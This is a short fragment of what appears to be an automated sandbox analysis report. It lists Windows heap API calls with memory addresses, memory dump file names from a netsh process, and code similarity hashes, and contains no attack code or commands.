              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,01565B32,?,?,00000000,?,01565D0B,?), ref: 01565A78
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,01565B32,?,?,00000000,?,01565D0B,?), ref: 01565A7F
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,01565B32,?,?,00000000,?,01565D0B,?), ref: 01565A8D
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,01565B32,?,?,00000000,?,01565D0B,?), ref: 01565A94
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              • Opcode ID: 9ab7804b407131e4aa6af31156c48982408ecc334eaa29226ea040a2c0b7473a
              • Instruction ID: e2071918d1a62a1c726fab2ae7fcf62933fc553888e1854b4b618f98981ac662
              • Opcode Fuzzy Hash: 9ab7804b407131e4aa6af31156c48982408ecc334eaa29226ea040a2c0b7473a
              • Instruction Fuzzy Hash: C6E08673630222ABD7211AF9788DF8BAE5DEBC4677F020025F71DDA044CAB144099BB0